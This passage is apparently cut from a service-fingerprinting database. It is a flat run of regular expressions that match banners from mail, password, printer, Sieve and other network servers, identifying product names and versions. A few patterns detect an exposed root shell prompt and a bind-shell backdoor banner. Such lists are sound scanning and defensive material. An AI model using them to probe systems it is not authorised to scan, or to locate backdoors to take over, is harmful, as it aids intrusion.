-\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n -pbmasterd(\d[-.\w]+)@[-.+\w]+: -PJLINK 1 [0-9a-f]{8}\r -201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n -\x01\x04\0\0\0\0\0\rD -NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 -usage: [/\w]*/etc/pksd\.conf conf_file\n -version report\n -welcome to the pioneers-meta-server version ([\d.]+)\n -\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n -\+OK Ready when you are <200\d+\. -\+OK Internet Rex POP3 server ready < -\+OK DBMAIL pop3 server ready to rock < -\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n -\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 -\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 -\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n -\+OK [Dd]ovecot ready\.\r\n -\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n -\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n -\+OK ready \r\n -\+OK POP3 server ready \r\n -\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d -\+OK Welcome to MailEnable POP3 Server -\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n -\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n -\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n -\+OK Lotus Notes POP3 server version ([-.\w]+) ready on -\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < -\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < -\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready -\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n -\+OK POP3 \[cppop (\d[^]]+)\] at \[ -\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n -\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n -\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n -\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) -\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n -\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n -\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n -\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n -\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n -\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n -\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready -\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n -\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at -\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n -\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n -\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n -\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) -\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n -\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n -\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 -\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready -\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK\r\n -\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready <\w{11}>\r\n -\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n -\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < -\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n -\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n -\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n -\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n -\+OK InterMail POP3 server ready\.\r\n -\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n -\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n -\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n -\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n -\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n -\+OK popserver ([\d.]+) pop3 server ready\r\n -\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n -\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n -\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n -\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n -\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n -\+OK ready\r\n -\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n -\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < -\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; -\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; -\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n -\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) -\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n -\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n -\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n -\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n -\+OK \(POP3\) hMailServer ([-\w.]+)\r\n -\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n -\+OK DAWKCo POP3 Server v([-\w_.]+) ready < -\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n -\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) -\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), -\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n -\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n -\+OK 4D Mail ([-\w_.]+) ready < -\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at -\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n -\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n -\+OK Welcome to Arvixe POP3 server\.\r\n -\+OK POP3 Server ready\r\n -\+OK POP3 server ready\r\n -\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n -\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n -\+OK popd-([\d.]+) ready \r\n -\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ --ERR Permission denied - closing connection\.\r\n -\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n -\+OK <[\d.]+@([-\w_.]+)>\r\n -\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK ready <[\d.]+@([-\w_.]+)>\r\n -\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n -\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. -\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n -\+OK [-\w_.]+ Welcome to the mail server\.\r\n -\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n -\+OK ([-\w_.]+) running EIMS X ([\w.]+) < -\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < -\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n -\+OK Dovecot DA ready\.\r\n -Unable to open trace file \"/var/spool/popper/ -\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n -\+OK Pop3 ready\.\r\n -\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n -\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n -\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n -\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n -Proxy\+ POP3 server\. Insecure access - terminating\.\r\n -\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n -\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n -\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n -\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n -\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n -\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n -\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n --ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n -\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n -\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n -\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n -\+OK ([-\w_.]+) POP3 proxy ready\r\n -\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n -\+OK InterScan VirusWall POP3 Proxy\r\n --ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n -\+OK MrPostman webmail proxy ready\r\n -\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n -\+OK hello from popgate\(([\d.]+)\)\r\n -\+OK \[ISafe POP3 Proxy\] \r\n -\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n -\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n -\+OK kingate pop3 proxy\r\n -\+OK avast! POP3 proxy ready\.\r\n -\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n -200 ([-._\w]+) poppassd v?([-._\w]+) -200 poppassd hello, who are you\?\r\n -200 hello there, who are you\?\r\n -200 hello there, please tell me who you are\r\n -200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n -200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service -200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n -200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < -550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n -200 Post\.Office v([\d.]+) password server ready\r\n -\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n -lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd -lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n -([-\w_.]+): /usr/lib/lpd: Malformed from address\n -\d+-201 ill-formed FROM address\. -\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ -QAS2 -\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 -\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 -200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n -\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 -_realplayfavs_::([\w\s]+)::connected\0 -(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t -\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 -\xe1\xe7\xe6\x07\0\x01\0 -roku: ready\r\n -\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian -\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 -\x02\x1c50\x1c\x03\0\0\0\0 -\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n -\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap -\"IMPLEMENTATION\" \"dovecot\"\r\n -\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n -/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n -\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n -SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> -t\x03\0\0 -\x01remshd: Kerberos Authentication not enabled\.\n -\x01remshd: Error! Kerberos authentication failed -(?:ba)?sh-\d\.\d\d\w?# -:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n -GENERAL: \d+ \d+\n -220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n -220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n -220 ([-/.+\w]+) MailGate ready for ESMTP on -220 ([-/.+\w]+) SMTP ready to roll\r\n -220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n -220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n -554-([-.+\w]+)\.us\r\n554 Access denied\r\n -220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at -220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n -554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; -220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd -520 Connection not authorised from this address\.\r\n -554 SMTP service not available\r\n -220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready -421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 -220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n -220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n -220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n -220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n -220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n -421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n -220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready -220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at -220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n -220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready -220 \+OK Microsoft Exchange SMTP server version ([\d.]+) -220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim -220 CheckPoint FireWall-1 secure ESMTP server\r\n -220 CheckPoint FireWall-1 secure SMTP server\r\n -220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd -220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at -220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at -220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at -530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at -220 ([-.+\w]+) SMTP/smap Ready\.\r\n -220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n -220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at -220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n -220(\S+) WebShielde(\w+)/SMTP Ready. -220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n -220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) -220 [\*\d\ ]{2,300}\r\n -220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n -220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n -220 ([-.\w]+) ESMTP Service. Welcome.\r\n -220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n -220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at -220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready -220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at -220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at -220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready -220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n -220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n -220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); -220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n -220 YSmtp(\S+) ESMTP service ready -220 (\S+) ESMTP WEB.DE V([^\s\;]+) -220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP -220 Welcome to Nemesis ESMTP server on \S+ -220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) -220 (\S+) ESMTP XWall v(\d\S+) -220 (\S+) eMail Sentinel (\d+) ESMTP Service ready -220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n -220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n -220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) -220[- ][^ ]+ Smail-([^ ]+) -220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n -220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n -220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n -220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n -220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n -220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n -220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) -220 ([-\w_.]+) ESMTP postfix NO UCE\r\n -220 ([-\w_.]+) SMTPD Server - Postfix\r\n -220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n -220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n -220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n -220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n -220 ESMTP Lyris service ready\r\n -220 ESMTP Lyris ListManager service ready\r\n -220 ([-\w_.]+) SMTP Ready 12\.\r\n -220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n -220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n -220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n -220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n -220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n -220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready -220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n -220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); -421 Sorry, SMTP server too busy right now \(193\); try again later\r\n -220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n -220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] -220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n -220 ([-\w_.]+) mailfront ESMTP\r\n -220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n -220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n -220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n -220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n -220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n -220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n -500 Permission denied - closing connection\.\r\n -220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n -220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n -220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n -220 LiteMail SMTP Server Ready\.\r\n -220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n -220 ([-\w_.]+) SMTP Server \(DeskNow\) ready -220 network-box ESMTP\r\n -220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n -220 ([-\w_.]+) AntiVir MailGate\r\n -220 server ESMTP KEN! v([\d.]+); .*\r\n -220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n -220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 -220 shttp\.srv Simple Mail Transfer Service Ready\r\n -501 Domain must resolve\r\n -220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n -220 mailmatrix SMTP Server \(Mail Matrix Server\) ready -220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); -220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n -220 ([-\w_.]+); .* \+\d+\r\n -421 unable to read controls \(#4\.3\.0\)\r\n -554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n -rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n -220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n -220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), -220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail -220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready -220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n -220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n -220 DP-3510\r\n -220 ([-\w_.]+) Axigen ESMTP ready\r\n -421 Unexpected log failure, please try later\r\n -220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( -220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ -554 ([-\w_.]+) ESMTP not accepting messages\r\n -220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready -220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n -220 ShareMailPro SMTP Server Ready \r\n -220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready -220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n -220 Service ready KM([\w._-]+) smtpd\r\n -220 ([\w_.-]+) cqgreylist - minimal smptd\r\n -220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); -220 DP-1820E\r\n -220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n -220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) -220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n -220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n -220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready -421 Service not available, closing transmission channel\r\n -421 Service not available, closing transmission channel \r\n -220 ([\w_.-]+) ESMTP OpenSMTPD\r\n -220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n -220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n -220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n -220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n -220 ([\w._-]+) running IBM VM SMTP Level (\d+) on -421 4\.3\.2 Service not available\r\n -220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n -220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n -220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n -220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n -220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n -220 ESMTP smtprelay service ready\.\r\n -220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n -220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n -421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n -220 